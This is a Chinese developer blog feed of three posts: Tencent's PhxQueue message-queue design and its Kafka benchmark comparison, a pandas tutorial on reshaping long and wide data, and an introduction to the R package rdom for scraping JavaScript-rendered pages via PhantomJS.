请PhxQueue给一个Star !欢迎提出你的issue和PR!

消息队列概述

消息队列作为成熟的异步通信模式,对比常用的同步通信模式,有如下优势:

  1. 解耦:防止引入过多的 API 给系统的稳定性带来风险;调用方使用不当会给被调用方系统造成压力,被调用方处理不当会降低调用方系统的响应能力。
  2. 削峰和流控:消息生产者不会堵塞,突发消息缓存在队列中,消费者按照实际能力读取消息。
  3. 复用:一次发布多方订阅。

PhxQueue诞生背景

旧队列

微信初期使用的分布式队列(称为旧队列)是微信后台自研的重要组件,广泛应用在各种业务场景中,为业务提供解耦、缓存、异步化等能力。

旧队列以 Quorum NRW 作为同步机制,其中 N=3、W=R=2,刷盘方式采用异步刷盘,兼顾了性能和可用性。

新需求

随着业务发展,接入业务种类日益增多,旧队列逐渐显得力不从心,主要不足如下:

  • 异步刷盘,数据可靠性堪忧
    对于支付相关业务,保证数据可靠是首要需求。
    目前大多数分布式队列方案是以同步复制+异步刷盘来保证数据可靠性的,但我们认为需要同步刷盘来进一步提高数据可靠性。
  • 乱序问题
    部分业务提出了绝对有序的需求,但 NRW 并不保证顺序性,无法满足需求。

另外旧队列还存在出队去重、负载均衡等其他方面的问题亟需改善。上述种种促使了我们考虑新的方案。

业界方案的不足

Kafka 是大数据领域常用的消息队列,最初由 LinkedIn 采用 Scala 语言开发,用作 LinkedIn 的活动流追踪和运营系统数据处理管道的基础。

其高吞吐、自动容灾、出入队有序等特性,吸引了众多公司使用,在数据采集、传输场景中发挥着重要作用,详见Powerd By Kafka。

但我们充分调研了 Kafka,认为其在注重数据可靠性的场景下,有如下不足:

1. Kafka 性能与同步刷盘的矛盾

Kafka 在开启配置 log.flush.interval.messages=1,打开同步刷盘特性后,吞吐会急剧下降。

该现象由如下因素导致:

  • SSD 写放大
    业务消息平均大小在数 1k 左右。
    而 SSD 一次刷盘的最小单位为一个 page size,大小为 4k。
    当 Kafka 对大小不足 4k 的消息进行刷盘时,实际写入的物理数据量是消息大小的数倍。导致硬盘写带宽资源被浪费。
  • 业务场景下 Producer batch 效果不好
    Kafka Producer batch,简单来说,就是把多个消息打包在一起发送到 Broker,广泛用于大数据场景。按道理,batch效果足够,是能抵消写放大的影响的。
    但业务场景下的消息生产不同于大数据场景下的日志生产,每个需要入队的业务请求在业务系统中有独立的上下文,batch难度大。即使在业务和Broker之间加入代理层,将Producer转移到代理层内进行batch,也因代理层的节点数众多,batch效果难以提高,导致写放大无法抵消。

2. Kafka replica 同步设计上的不足

Kafka replica 同步设计概要:

Kafka Broker leader 会跟踪与其保持同步的 follower 列表,该列表称为ISR(即in-sync Replica)。如果一个 follower 宕机,或者落后太多,leader 将把它从ISR中移除。

该同步方式偏重于同步效率,但是在可用性方面表现略显不足:

  • Broker fail over 过程成功率下降严重
    在3 replicas的场景下,leader 均匀分布在各 Broker 上,一个Broker出现故障,就意味着1/3的 leader、follower 离线,这时读写成功率下降:
+ 对于 leader 离线的 partition,暂时无法读写,需要等待 Controller 选举出新的 leader 后才能恢复;
+ 对于 follower 离线的 partition,也暂时无法读写,需要等待一定时长(取决于 replica.lag.time.max.ms,默认10s)后,leader 将故障 follower 从 ISR 中剔除才能恢复。

也就是说,任意一个 Broker 故障时,读写成功率会在一段时间内降为0。

  • 同步延迟取决于最慢节点

在同步复制场景下,需要等待所有节点返回ack。

通过对比 Kafka replica 与 Paxos 的表现,我们认为在同步方式上 Paxos 是更好的选择:

所以,我们基于旧队列,用 Paxos 协议改造了同步逻辑,并且进行了包括同步刷盘之内的多项优化,完成了 PhxQueue。

PhxQueue 介绍

PhxQueue 目前在微信内部广泛支持微信支付、公众平台等多个重要业务,日均入队达千亿,分钟入队峰值达一亿。

其设计出发点是高数据可靠性,且不失高可用和高吞吐,同时支持多种常见队列特性。

PhxQueue支持的特性如下:

  • 同步刷盘,入队数据绝对不丢,自带内部实时对账
  • 出入队严格有序
  • 多订阅
  • 出队限速
  • 出队重放
  • 所有模块均可平行扩展
  • 存储层批量刷盘、同步,保证高吞吐
  • 存储层支持同城多中心部署
  • 存储层自动容灾/接入均衡
  • 消费者自动容灾/负载均衡

PhxQueue设计

整体架构

PhxQueue 由下列5个模块组成。

  1. Store - 队列存储

Store 作为队列存储,引入了 PhxPaxos 库,以 Paxos 协议作副本同步。只要多数派节点正常工作及互联,即可提供线性一致性读写服务。

为了提高数据可靠性,同步刷盘作为默认开启特性,且性能不亚于异步刷盘。

在可用性方面,Store 内有多个独立的 paxos group,每个 paxos group 仅 master 提供读写服务,平时 master 动态均匀分布在 Store 内各节点,均衡接入压力,节点出灾时自动切换 master 到其它可用节点。

  1. Producer - 生产者

Producer 作为消息生产者,根据 key 决定消息存储路由。相同 key 的消息默认路由到同一个队列中,保证出队顺序与入队顺序一致。

  1. Consumer - 消费者

Consumer 作为消费者,以批量拉取的方式从 Store 拉消息,支持多协程方式批量处理消息。

Consumer 以服务框架的形式提供服务,使用者以实现回调的方式,根据不同主题(Topic),不同处理类型(Handler)定义具体的消息处理逻辑。

  1. Scheduler - 消费者管理器(可选择部署)

Scheduler 的作用是,收集 Consumer 全局负载信息, 对 Consumer 做容灾和负载均衡。当使用者没有这方面的需求时,可以省略部署 Scheduler,此时各 Consumer 根据配置权重决定与队列的处理关系。

部署 Scheduler 后,Scheduler leader 与所有 Conusmer 维持心跳,在收集 Consumer 的负载信息的同时,反向调整 Consumer 与队列的处理关系。

当 Scheduler leader 宕机了后,Scheduler 依赖下述分布式锁服务选举出新 leader,不可用期间仅影响 Consumer 的容灾和负载均衡,不影响 Consumer 的正常消费。

  1. Lock - 分布式锁(可选择部署)

Lock 是一个分布式锁,其接口设计非常通用化,使用者可以选择将 Lock 独立部署,提供通用分布式锁服务。

Lock 在 PhxQueue 中的作用有如下两点:

(1). 为 Scheduler 选举 leader;
(2). 防止多个 Consumer 同时处理一条队列。

Lock 同样也是可选择部署的模块:

若部署了 Scheduler,就必须部署 Lock 为 Scheduler 选举出 leader;
否则,若业务对重复消费不敏感,可选择不部署 Lock。

这里所指的重复消费场景是:若省略部署 Scheduler 的话,Consumer 需要通过读取配置得知可处理的队列集合;当队列有变更(如队列缩扩容)时,各 Consumer 机器上的配置改变有先有后,这时各 Consumer 在同一时间看到的配置状态可能不一样,导致一段时间内两个 Consumer 都认为自己该消费同一个队列,造成重复消费。Lock 的部署可以避免该场景下的重复消费。(注意,即使省略部署 Lock,该场景仅造成重复消费,而不会造成乱序消费)

Store 复制流程

PhxQueue Store 通过 PhxPaxos 协议进行副本复制。

PhxPaxos 的工程实现方式分为三层:app 层负责处理业务请求,paxos 层执行 paxos同步过程,状态机层更新业务状态。

其中,app 层发起 paxos 提议,paxos 层各节点通过 paxos 协议共同完成一个 paxos log 的确认,之后状态机以 paxos log 作为的输入作状态转移,更新业务的状态,最后返回状态转移结果给 app 层。

一致的状态机层,加上来自 paxos 层的一致输入,就产生一致的状态转移,从而保证多个节点强一致。

这里我们要基于 PhxPaxos 在状态机层实现一个队列,就需要作如下概念映射:

  • 队列这种模型不涉及数据修改,是有序的数据集合,和 paxos log 的定义很像,所以可以让入队的数据直接作为 paxos log,而状态机只需要保存 paxos log 序列。
  • instance id 的严格递增特性,使得它可以方便地作为队列偏移。
  • 队列中读偏移之前的数据,认为是可以删除的数据,这点和 check point 的定义一致。

整体上队列状态机和 paxos 能很好地切合。

Store Group Commit-高效刷盘及副本同步

未经优化的 Paxos 协议并未解决同步刷盘的写放大问题。而且,其副本同步效率不如 Kafka。

原因是,Kafka 的副本同步是流式批量的,而 Paxos 协议是以 paxos log 为单位串行同步,每个 paxos log 的同步开销是 1个RTT + 1次刷盘。

在多DC部署的场景下,ping 时延可达4ms,这样会导致单个 paxos group 的理论最高 TPS 仅250。

我们采用多 paxos group 部署 以及 Group Commit 的方式来同时解决同步刷盘的写放大问题以及Paxos吞吐问题。

如上图, 我们部署多个paxos group,以 paxos group 作为 Group Commit 的单位,一个 paxos group 内对应多个queue,将多个queue在一段时间内入队的数据合并在一起,当等待耗时或积累数据数目达到阀值,才会触发一次Paxos同步和同步刷盘,等待期间前端阻塞。

与Kafka的Producer批量逻辑相比,在存储层以 Group Commit 进行批量合并的好处如下:

(1). 业务层无需关注如何组织请求进行批量;
(2). 在存储层以 paxos group 为单位的聚合效果比上层聚合效果更好。

PhxQueue 与 Kafka 对比

下面分别从设计、性能、存储层 failover 过程三方面对比 PhxQueue 与 Kafka。

设计对比

PhxQueue 架构虽然与 Kafka 等常见分布式队列类似,但设计上仍有不少独特之处。为了能让对 Kafka 有一定了解的读者更方便地了解 PhxQueue,下面列出了两者的对比。

注:以下对比基于相同的数据可靠性场景:少数派节点失效,不会造成数据丢失,且整体依旧可用。

性能对比

测试环境

1
2
3
4
5
6
复制代码CPU: 64 x Intel(R) Xeon(R) CPU E5-2620 v3 @ 2.40GHz
Memory: 64 GB
Network: 10 Gigabit Ethernet
Disk: SSD Raid 10
Cluster Nodes: 3
Ping: 1ms

测试基准及配置

测试结果

开启 Producer Batch:

关闭 Producer Batch:

以上场景,PhxQueue 瓶颈在 cpu,使用率达70% ~ 80%。

小结

  1. PhxQueue 性能与 Kafka 持平;
  2. 相同 QPS 下,由于不用等最慢节点返回,PhxQueue 平均耗时比 Kafka 稍优;
  3. 关闭 Producer Batch 后,在同步刷盘场景下,PhxQueue 性能可达 Kafka 的2倍,原因是,PhxQueue 存储层在写盘前做了 batch,而 Kafka 没有,所以后者会有写放大。

储存层 failover 过程对比

主要对比杀死存储层的一个节点后,对整体吞吐的影响。

Kafka

表现:

  • Failover 期间,在不同阶段程度不同,入队成功率在0% ~ 33%;
  • Failover 持续时间由租约决定,租约时长默认10s。

测试过程:

将 replica.lag.time.max.ms 从 10s 调整为 60s(延长时间方便观察),然后 kill Broker 0,挑选3个 partition,观察 ISR 变化如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
复制代码第一阶段(未 kill Broker 0):
Topic: test-dis-p100 Partition: 96 Leader: 0 Replicas: 0,1,2 Isr: 1,0,2
Topic: test-dis-p100 Partition: 97 Leader: 1 Replicas: 1,2,0 Isr: 1,0,2
Topic: test-dis-p100 Partition: 98 Leader: 2 Replicas: 2,0,1 Isr: 1,0,2

第二阶段(kill Broker 0 后持续8s):
Topic: test-dis-p100 Partition: 96 Leader: 0 Replicas: 0,1,2 Isr: 1,0,2
Topic: test-dis-p100 Partition: 97 Leader: 1 Replicas: 1,2,0 Isr: 1,0,2
Topic: test-dis-p100 Partition: 98 Leader: 2 Replicas: 2,0,1 Isr: 1,0,2

第三阶段(持续1分钟左右):
Topic: test-dis-p100 Partition: 96 Leader: 1 Replicas: 0,1,2 Isr: 2,1
Topic: test-dis-p100 Partition: 97 Leader: 1 Replicas: 1,2,0 Isr: 2,1,0
Topic: test-dis-p100 Partition: 98 Leader: 2 Replicas: 2,0,1 Isr: 2,1,0

第四阶段(至此入队成功率完全恢复):
Topic: test-dis-p100 Partition: 96 Leader: 1 Replicas: 0,1,2 Isr: 2,1
Topic: test-dis-p100 Partition: 97 Leader: 1 Replicas: 1,2,0 Isr: 2,1
Topic: test-dis-p100 Partition: 98 Leader: 2 Replicas: 2,0,1 Isr: 2,1

其中,第二/三阶段标红处对应的partition入队成功率受损:

  • 第二阶段期间,Partition 96/97/98 均无法写入,入队成功率成功率下降至0%。
  • 第三阶段期间,Partition 96 可继续写入,但 Partition 97/98 无法写入,因为写入要等 Broker 0 回 ack,但 Broker 0 已 kill,入队成功率下降至33%。

而实际观察,第二/三阶段期间完全没吞吐,原因是压测工具不断报连接失败,停止了写入。

压测工具输出:

1
2
3
4
5
6
7
8
9
10
11
复制代码30551 records sent, 6107.8 records/sec (0.06 MB/sec), 1733.9 ms avg latency, 5042.0 max latency.
30620 records sent, 6117.9 records/sec (0.06 MB/sec), 1771.9 ms avg latency, 5076.0 max latency.
30723 records sent, 6123.8 records/sec (0.06 MB/sec), 1745.4 ms avg latency, 5009.0 max latency.
30716 records sent, 6127.3 records/sec (0.06 MB/sec), 1841.1 ms avg latency, 5299.0 max latency.
30674 records sent, 6133.6 records/sec (0.06 MB/sec), 1621.3 ms avg latency, 4644.0 max latency.
>>> kill Broker 0 here (入队成功率受损)>>>
10580 records sent, 123.4 records/sec (0.00 MB/sec), 1537.1 ms avg latency, 84236.0 max latency. <<---吞吐下降严重
11362 records sent, 132.3 records/sec (0.00 MB/sec), 1658.3 ms avg latency, 84232.0 max latency.
11367 records sent, 132.3 records/sec (0.00 MB/sec), 1582.4 ms avg latency, 84228.0 max latency.
11236 records sent, 130.9 records/sec (0.00 MB/sec), 1694.2 ms avg latency, 84240.0 max latency.
11406 records sent, 132.8 records/sec (0.00 MB/sec), 1650.5 ms avg latency, 84233.0 max latency.

压测工具连接Broker失败日志:

1
2
复制代码[2017-08-16 15:38:22,844] WARN Connection to node 0 could not be established. Broker may not be available. (org.apache.kafka.clients.NetworkClient)
[2017-08-16 15:38:22,859] WARN Connection to node 0 could not be established. Broker may not be available. (org.apache.kafka.clients.NetworkClient)

原因分析:

Kafka Broker leader 是通过 Controller 选举出来的,ISR 列表是 leader 维护的。

前者的的租约是 Controller 定义的,后者的租约是 Broker 配置 replica.lag.time.max.ms 指定的。

所以,第二阶段持续时间较短,是 Controller 的租约时间决定的,第三阶段持续时间较长,是 replica.lag.time.max.ms 决定的。

当 Broker 0 被 kill 时,前者影响本来 Broker 0 是 leader 的 1/3 partitions 的入队成功率,后者影响 Broker 0 作为 follower 的 2/3 partitions 的入队成功率。

PhxQueue

表现:

  • Failover 期间,入队成功率仅下降至66%;
  • Failover 持续时间由租约决定,租约时长默认5s。
  • 开启 换队列重试特性(适合没有绝对顺序性要求的业务提高可用性)后,Failover 期间仍有90+%入队成功率。

测试过程:

将 Store master 租约时长从10s调整为60s(延长时间方便观察),然后kill store 0,观察某 Producer 入队成功率:

关闭换队列重试特性:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
复制代码>>> kill store 0 here (入队成功率受损)>>>

-------------------------------------------
-- total: 192323
-- time(ms): 10015
-- qps: 19203.49
-- routine_sleep: 73.88%
-- retcode cnt percent
-- -1 22097 11.49 <<--- 失败:连接失败
-- 0 125905 65.47 <<--- 成功:仍有66%成功率
-- 10102 44321 23.05 <<--- 失败:提示需要重定向到 master
-- usetime(ms) cnt percent
-- < 1 0 0.00
-- < 2 0 0.00
-- < 5 610 0.32
-- < 10 7344 3.82
-- < 20 18937 9.85
-- < 50 36067 18.75
-- < 100 6971 3.62
-- < 200 20239 10.52
-- < 500 59059 30.71
-- < 1000 30601 15.91
-- >= 1000 12495 6.50


>>> (入队成功率完全恢复)>>>

-------------------------------------------
-- total: 198955
-- time(ms): 10001
-- qps: 19893.51
-- routine_sleep: 98.00%
-- retcode cnt percent
-- 0 198955 100.00 <<--- 成功:100%成功率
-- usetime(ms) cnt percent
-- < 1 0 0.00
-- < 2 2 0.00
-- < 5 5895 2.96
-- < 10 30830 15.50
-- < 20 65887 33.12
-- < 50 95403 47.95
-- < 100 753 0.38
-- < 200 185 0.09
-- < 500 0 0.00
-- < 1000 0 0.00
-- >= 1000 0 0.00

开启换队列重试特性:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
复制代码>>> kill store 0 here (入队成功率受损)>>>

-------------------------------------------
-- total: 134752
-- time(ms): 10001
-- qps: 13473.85
-- routine_sleep: 77.43%
-- retcode cnt percent
-- -202 14 0.01 <<--- 失败:超时
-- -1 2712 2.01 <<--- 失败:连接失败
-- 0 127427 94.56 <<--- 成功:仍有94%成功率
-- 10102 4572 3.39 <<--- 失败:提示需要重定向到 master
-- 10105 27 0.02 <<--- 失败:master 未选举出来
-- usetime(ms) cnt percent
-- < 1 0 0.00
-- < 2 4 0.00
-- < 5 3284 2.44
-- < 10 10704 7.94
-- < 20 22109 16.41
-- < 50 32752 24.31
-- < 100 4541 3.37
-- < 200 4331 3.21
-- < 500 11265 8.36
-- < 1000 19706 14.62
-- >= 1000 26056 19.34

>>> (入队成功率完全恢复)>>>

-------------------------------------------
-- total: 198234
-- time(ms): 10014
-- qps: 19795.69
-- routine_sleep: 94.36%
-- retcode cnt percent
-- 0 198234 100.00 <<--- 成功:100%成功率
-- usetime(ms) cnt percent
-- < 1 0 0.00
-- < 2 0 0.00
-- < 5 3875 1.95
-- < 10 22978 11.59
-- < 20 53000 26.74
-- < 50 87575 44.18
-- < 100 6204 3.13
-- < 200 6468 3.26
-- < 500 11963 6.03
-- < 1000 5637 2.84
-- >= 1000 534 0.27

小结:

在存储层 failover 过程中,PhxQueue 和 Kafka 的入队成功率均有一定时长的下降,PhxQueue 的入队成功率在66% ~ 100%,Kafka 的入队成功率在0% ~ 33%;
PhxQueue 开启换队列重试特性后,failover 过程中入队成功率保持在90+%;
PhxQueue 和 Kafka 均能自动切换 master,最终入队成功率完全恢复。

小结

PhxQueue 在存储层做了很多的努力:实现了 master 自动切换,且仍然保证线性一致,切换期间仍然高可用;保证了同步刷盘的吞吐,其性能不亚于异步刷盘。

另外实现了大部分队列实用特性,例如出入队顺序一致、多订阅、限速、消息重放等,适用于各种业务场景。

目前 PhxQueue 已在微信内部大规模使用,也正式开源。

我们将保持 PhxQueue 开源版本与内部版本的一致,欢迎读者试用并反馈意见。

Github开源地址:github.com/Tencent/phx…

请PhxQueue给一个Star !
欢迎提出你的issue和PR

转载自【腾讯开源】公众号,腾讯官方开源资讯,期待您的关注。

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

Python3 pandas处理长型与宽型数据

发表于 2017-11-22

Python处理二维的dataframe数据主要依靠pandas包。这一点与R语言不同,R中处理dataframe的包是多面开花。不过现在这些处理函数慢慢有语法大一统的趋势,如tidyverse生态链。

在处理数据常常会遇到长宽数据互转,如从Wind数据库导出的公司财务数据。在Stata和R中已经有比较便捷的处理方法。

下面列示一下pandas包的处理方法。


首先,生成一份模拟数据。

1
2
3
4
5
6
7
8
9
10
11
复制代码import pandas as pd
import numpy as np

df=pd.DataFrame(np.random.rand(3,6),columns=['x', 'lev2015','roa2015', 'roa2016', 'lev2016','lev2017'])
df['stkcd']=['a1','a2','a3']
df
Out[1]:
x lev2015 roa2015 roa2016 lev2016 lev2017 stkcd
0 0.434583 0.352021 0.155295 0.307686 0.226555 0.718034 a1
1 0.440119 0.051882 0.667143 0.995478 0.114729 0.996174 a2
2 0.292902 0.516601 0.157647 0.066176 0.506407 0.968796 a3

然后开始从长转为宽。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
复制代码df=df.melt(id_vars=['stkcd','x'],value_vars=['lev2015','roa2015', 'roa2016', 'lev2016','lev2017'],var_name='name',value_name='score')

df
Out[2]:
stkcd x name score
0 a1 0.434583 lev2015 0.352021
1 a2 0.440119 lev2015 0.051882
2 a3 0.292902 lev2015 0.516601
3 a1 0.434583 roa2015 0.155295
4 a2 0.440119 roa2015 0.667143
5 a3 0.292902 roa2015 0.157647
6 a1 0.434583 roa2016 0.307686
7 a2 0.440119 roa2016 0.995478
8 a3 0.292902 roa2016 0.066176
9 a1 0.434583 lev2016 0.226555
10 a2 0.440119 lev2016 0.114729
11 a3 0.292902 lev2016 0.506407
12 a1 0.434583 lev2017 0.718034
13 a2 0.440119 lev2017 0.996174
14 a3 0.292902 lev2017 0.968796

但是仔细一看,还需要再转一次。把name分割为两个变量。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
复制代码df['year']=df['name'].str.slice(3,7)
df['name']=df['name'].str.slice(0,3)

df
Out[3]:
stkcd x name score year
0 a1 0.434583 lev 0.352021 2015
1 a2 0.440119 lev 0.051882 2015
2 a3 0.292902 lev 0.516601 2015
3 a1 0.434583 roa 0.155295 2015
4 a2 0.440119 roa 0.667143 2015
5 a3 0.292902 roa 0.157647 2015
6 a1 0.434583 roa 0.307686 2016
7 a2 0.440119 roa 0.995478 2016
8 a3 0.292902 roa 0.066176 2016
9 a1 0.434583 lev 0.226555 2016
10 a2 0.440119 lev 0.114729 2016
11 a3 0.292902 lev 0.506407 2016
12 a1 0.434583 lev 0.718034 2017
13 a2 0.440119 lev 0.996174 2017
14 a3 0.292902 lev 0.968796 2017

此时把name转回去即可(从变量的转成列变量的名)。这个就是我们想要的数据,不信你可以用df.to_csv(‘wide_long.csv’)导出数据试试看。具体如下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
复制代码df=df.pivot_table(index=['stkcd','x','year'], columns='name', values='score')

df
Out[4]:
name lev roa
stkcd x year
a1 0.434583 2015 0.352021 0.155295
2016 0.226555 0.307686
2017 0.718034 NaN
a2 0.440119 2015 0.051882 0.667143
2016 0.114729 0.995478
2017 0.996174 NaN
a3 0.292902 2015 0.516601 0.157647
2016 0.506407 0.066176
2017 0.968796 NaN

不过呢,这个数据太难看了。进一步处理如下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
复制代码df=df.reset_index()

df
Out[5]:
name stkcd x year lev roa
0 a1 0.434583 2015 0.352021 0.155295
1 a1 0.434583 2016 0.226555 0.307686
2 a1 0.434583 2017 0.718034 NaN
3 a2 0.440119 2015 0.051882 0.667143
4 a2 0.440119 2016 0.114729 0.995478
5 a2 0.440119 2017 0.996174 NaN
6 a3 0.292902 2015 0.516601 0.157647
7 a3 0.292902 2016 0.506407 0.066176
8 a3 0.292902 2017 0.968796 NaN

最后附图(点击可以放大)。一般的长宽型都可以按照这个思路操作,只是会根据语言工具的差异略有调整。

操作过程与版本信息

示意图


问:为什么模拟那么丑的df?

答:有时候现实的df就很丑。

问:为什么这么写?麻烦,长。

答:通用,不惧df的美丑。

问:有更好的操作么😝

答:靠你自动手🤗

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

这个包绝对值得你用心体验一次!

发表于 2017-11-22

这一段时间在研究R里面的数据抓取相关包,时不时的能发掘出一些惊喜。

比如今天,我找到了一个自带请求器的解析包,而且还是嵌入的pantomjs无头浏览器,这样就不用你再傻乎乎的再去装个selenium驱动,也不用借助任何请求器(RCurl或者httr)包就可以自动解析带有js脚本的HTML文档。

耳听为虚,眼见为实,还记得之前讲解表格数据抓取的那一节,遇到的天气数据表格,里面的数据拿不到,有些棘手。害得我动用了RSelenium调用了plantomjs才得以解决,但是!


今天讲解的这个包将所有的任务量缩减到一句代码!

1
2
复制代码library("rvest")
URL<-"https://www.aqistudy.cn/historydata/monthdata.php?city=北京" %>% xml2::url_escape(reserved ="][!$&'()*+,;=:/?@#")

大家可以试一试使用普通的请求方法是否可以成功获取里面的表格(要是成功了算我输!!!)

使用RCurl包请求!

1
2
3
4
复制代码header<-c("User-Agent"="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36")
mytable <- getURL(URL,httpheader=header,.encoding="UTF-8") %>% htmlParse(encoding ="UTF-8") %>% readHTMLTable(header=TRUE)
$`NULL`
NULL

这是多大仇多大怨啊_

使用rvest试一试:

1
2
复制代码mytable <- URL %>%  read_html(encoding ="UTF-8") %>% html_table(header=TRUE) %>% `[[`(1)
[1] 月份 AQI 范围 质量等级 PM2.5 PM10 SO2 CO NO2 O3

恩,对,这次进步了,拿到了表头,可是这有什么卵用!!!

使用selenium驱动浏览器

1
2
3
4
5
6
7
复制代码#java -jar D:/selenium-server-standalone-3.3.1.jar
#system("java -jar D:/selenium-server-standalone-3.3.1.jar",intern=FALSE)

start_session(root="http://localhost:4444/wd/hub/",browser ="phantomjs")
post.url(URL)
mytable<-page_source() %>% stri_conv(from="utf-8") %>% read_html() %>% html_table()
quit_session()


这次总算拿到了!数一数写了多少字的代码!

有木有更加快捷的方法呢,当然有啦!

接下来瞪大眼睛看这一款神器!

使用rdom包:

1
2
3
4
5
6
7
8
复制代码stopifnot(Sys.which("phantomjs") != "")
#以上代码检测系统路径中是否含有phantomjs浏览器
#如果没有下载过phantomjs浏览器或者下载过但是没有加入系统路径,
#记得从新操作一下,否则一下函数无法运行!devtools::install_github("cpsievert/rdom")
#安装rdom包(如果总是提示timeout的话,记得加载一下curl包)

library("rdom")
tbl <- rdom(URL) %>% readHTMLTable(header=TRUE) %>% `[[`(1)


有木有看清楚什么情况,没有,已经完事儿,真的是只有一行代码!

似不似,有点儿惊讶,rdom后台调用了plantomjs浏览器渲染了整个html目标文档(包含里面的所有script标签里面的js动态脚本),所以readHTMLTable函数才有机会提取里面的表格(而这个过程,普通请求器比如RCurl或者httr都没有权限办到!),是不是很腻害呀!

下面这一句只是稍微修复一下编码!

1
2
复制代码names(tbl) <- names(tbl) %>% stri_conv(from="utf-8")
DT::datatable(tbl)



这篇文章对于R语言网络数据抓取而言意义重大,这是我第一次在R里面看到竟然有一个自带请求器的解析器,而且还是调用的plantomjs无头浏览器,专治各种wed端js动态脚本的隐藏数据。

rdom是一个很小众的包,但是它的设计理念有点儿逆天,整个包只有一个函数——rdom,和包名相同,它的工作只有一个,就是按照真实浏览器渲染HTML文档的模式去渲染整个HTML文档。在后台调用plantomjs来处理渲染的过程,之后你可以自由的使用其他R中的高效快捷函数进行元素提取。

项目主页在这里!

1
复制代码https://github.com/cpsievert/rdom

记得在使用前需要下载plantomjs无头浏览器(将浏览器目录添加到环境变量),很小的,不占内存。

1
复制代码http://phantomjs.org/

关于异步加载的逻辑以及为何带有异步加载的网页里,XML包的readHTMLTable函数和rvest包的html_table函数统统对束手无策,项目主页里作者都有提到。

作者从更为专业的角度进行了解释!!!

Web scraping packages such as XML, xml2 and rvest allow you to download and parse HTML files, but they lack a browsing engine to fully render the DOM.

XML和xml2以及rvest包,允许你直接从url地址下载并解析HTML文档,但是它们确少一个中介浏览器引擎来渲染这些HTML源文档!

XML::htmlParse() (and rvest::read_html()) returns the HTML page source,
which is static, and doesn’t contain theelement we desire (because JavaScript is modifying the state of the DOM):

因而,通过这些包请求到的HTML文档整体而言是静态的,它们不包含HTML文档中那些重要的嵌套在script标签内的数据(而这些script标签内的数据通常是由JavaScript脚本来进行操控和修改的)。

The main function in rdom, rdom(), uses phantomjs to render and return the DOM as an HTML string. Instead of passing the entire DOM as a string from
phantomjs to R, you can give rdom() a CSS Selector to extract certain element(s).

rdom包只有一个函数——rdom,它在后台调用phantomjs浏览器来对请求的HTML文档进行渲染,并将渲染后的完整HTML文档返回。(而这个渲染过程现行R中所有请求器都无法办到)。你可以提供给rdom函数一个css路径,来从HTML文档中抽取一部分内容返回。

对R语言数据抓取感兴趣的各位小伙伴儿,这个包绝对能给你带来惊喜,如果你有兴趣,甚至可以阅读它的源码,看大神什么是如何神不知鬼不觉的在底层封装plantomjs无头浏览器来解析动态js脚本的HTML文档的。

希望最近这些小文,能给今后大家学习R语言数据抓取带有更多便利,让大家少走弯路。

在线课程请点击文末原文链接:

Hellobi Live | 9月12日 R语言可视化在商务场景中的应用
往期案例数据请移步本人GitHub:
github.com/ljtyduyu/Da…

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

1…935936937…956

开发者博客

9558 日志
1953 标签
RSS
© 2025 开发者博客
本站总访问量次
由 Hexo 强力驱动
|
主题 — NexT.Muse v5.1.4
0%